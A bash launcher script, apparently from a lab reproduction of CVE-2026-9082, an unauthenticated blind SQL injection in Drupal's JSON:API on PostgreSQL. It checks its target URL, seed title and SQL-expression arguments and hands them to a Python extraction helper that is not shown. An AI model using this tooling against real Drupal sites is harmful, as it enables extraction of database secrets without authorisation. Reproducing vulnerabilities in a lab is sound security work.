#!/usr/bin/env bash
# CVE-2026-9082 — unauthenticated SQLi in Drupal Core (PostgreSQL) via JSON:API.
# Recovers a DB secret through blind boolean-based extraction over the public HTTP
# surface only. No DB credentials, no Drupal session.
#
# Usage: run.sh <base_url> <base_title> <sql_expression>
#   base_url       e.g. http://127.0.0.1:8888
#   base_title     a title that matches the seed article (makes base IN TRUE)
#   sql_expression scalar SQL whose value is extracted, e.g.
#                  "SELECT secret FROM lab_secret WHERE id=1"
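set -euo pipefail

# Fail with a usage line when an argument is missing. Without this check,
# `set -u` aborts on the first unset positional parameter with only a bare
# "unbound variable" message. Extra arguments are still ignored, as before.
if (( $# < 3 )); then
  printf 'Usage: %s <base_url> <base_title> <sql_expression>\n' "${0##*/}" >&2
  exit 2
fi

BASE_URL="$1"
BASE_TITLE="$2"
SQL="$3"

# Resolve the helper relative to this script so the wrapper works from any
# working directory. `--` keeps a path starting with '-' from being read as
# an option by dirname.
script_dir="$(dirname -- "$0")"
helper="${script_dir}/extract.py"

# Check for the helper up front so a missing file is reported by name.
if [[ ! -f "$helper" ]]; then
  printf '%s: helper not found: %s\n' "${0##*/}" "$helper" >&2
  exit 1
fi

# Replace this shell with the Python helper. Each value is passed as its own
# quoted argv entry, so the shell never re-parses the URL, title or SQL text.
exec python3 "$helper" "$BASE_URL" "$BASE_TITLE" "$SQL"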
